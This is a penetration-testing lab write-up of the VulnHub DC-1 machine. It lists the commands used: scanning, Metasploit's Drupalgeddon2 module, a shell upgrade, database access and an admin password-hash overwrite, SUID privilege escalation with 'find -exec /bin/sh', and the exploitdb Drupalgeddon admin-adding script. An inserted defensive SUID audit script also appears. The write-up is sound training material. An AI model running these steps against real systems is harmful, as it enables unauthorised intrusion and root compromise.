DC1 Lab Practice

Posted by Minarui on 2024-05-07

DC1

Download link:

https://download.vulnhub.com/dc/DC-1.zip

Challenge description:

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

Information gathering

1.1 arp-scan -l

1.2 ifconfig

1.3 nmap -p- -sV 192.168.126.130

Found rpcbind

The rpcbind service on port 111 can be abused for DDoS attacks via UDP reflection

1.4 whatweb

Penetration

2.1 Found Drupal 7

2.2 Start msf

2.3 search drupal

2.3 Tried the unix/webapp/drupal_drupalgeddon2 remote command execution vulnerability

use 1

show options

set rhost 192.168.126.130

run

Shell obtained successfully

sysinfo (use help to view the available commands)

ls

2.4 Found flag1.txt

cat flag1.txt

Database

3.1 The hint says there is something in the Drupal site configuration file

3.2 Found the database

3.3 Switch to the host's command shell

shell

or

shell

Get a fully interactive terminal

python -c 'import pty;pty.spawn("/bin/bash")'

script /dev/null

3.4 mysql -udbuser -p

R0ck3t

show databases;

use drupaldb;

show tables;

select * from users;

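(type exit to quit)

3.5 Viewing the site configuration file earlier showed that the hash is salted MD5

so this hash cannot be brute-forced

Take a different approach

3.6 Password reset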

find / -name "password-hash.sh"

php /var/www/scripts/password-hash.sh 123

Copy the salted MD5

$S$DRg21kugCL0AGQqr1G90hPfO.XkoCuhFqYU.HZfT8me7BiSMlYPT

Enter mysql again

update users set pass="$S$DMHrgiAJFOw9uyksr.7CaAWWS1eMIGnGmCCjFFZrNdaDIg4dcw8B" where uid=1;

4.1 Log in to the admin backend

http://192.168.126.130

The context in the top-left corner

4.2 Found flag3

Following the hint

cat /etc/passwd

cat /home/flag4.txt

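4.3 Found flag4

Privilege escalation

5.1 Escalate privileges following the flag4 hint

Linux privilege escalation: SUID privilege escalation

5.2 Search for commands that have the SUID bit set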

find / -perm -u=s -type f 2>/dev/null

find itself has the SUID bit set

5.3 Privilege escalation with find

find /usr/bin/find -exec "/bin/sh" \;

cd /root

cat thefinalflag.txt

5.4 Found the last flag
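
Steps 5.2 and 5.3 work because find carries the SUID bit. As an added example (not part of the original post), the script below runs the same find test from the defender's side and reports SUID binaries that are able to launch other commands. The names RISKY, flag_risky and audit_suid are assumptions made for this example, and the RISKY list is not exhaustive.

```shell
#!/bin/sh
# Added example, not from the original post: audit set-uid binaries.
# RISKY is an assumed, non-exhaustive list of programs that can run other
# commands and therefore should not carry the SUID bit.
RISKY="find bash sh dash vim vi awk perl python python3 ruby php nmap env less more"

# flag_risky: read file paths on stdin, print those whose basename is in RISKY.
flag_risky() {
    while IFS= read -r path; do
        name=${path##*/}
        for r in $RISKY; do
            if [ "$name" = "$r" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# audit_suid DIR: list SUID regular files under DIR (same filesystem only)
# using the find test from step 5.2, then keep the ones flag_risky matches.
audit_suid() {
    find "${1:-/}" -xdev -perm -u=s -type f 2>/dev/null | flag_risky
}

# Run the audit only when a start directory is given, e.g.: sh suid_audit.sh /
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

On a host where /usr/bin/find is reported, chmod u-s /usr/bin/find removes the bit.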

Covering what was missed

3.7 CVE-2014-3704-Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)

3.8 searchsploit Drupal

Found that Drupal 7 has a vulnerability that adds an admin user

3.9 Locate

locate php/webapps/34992.py

3.10 Copy to the desktop

cp /usr/share/exploitdb/exploits/php/webapps/34992.py ./

3.11 View usage

cat 34992.py

3.12 Added test/test successfully

3.13 Log in to the admin backend

3.14 flag3 can be seen this way as well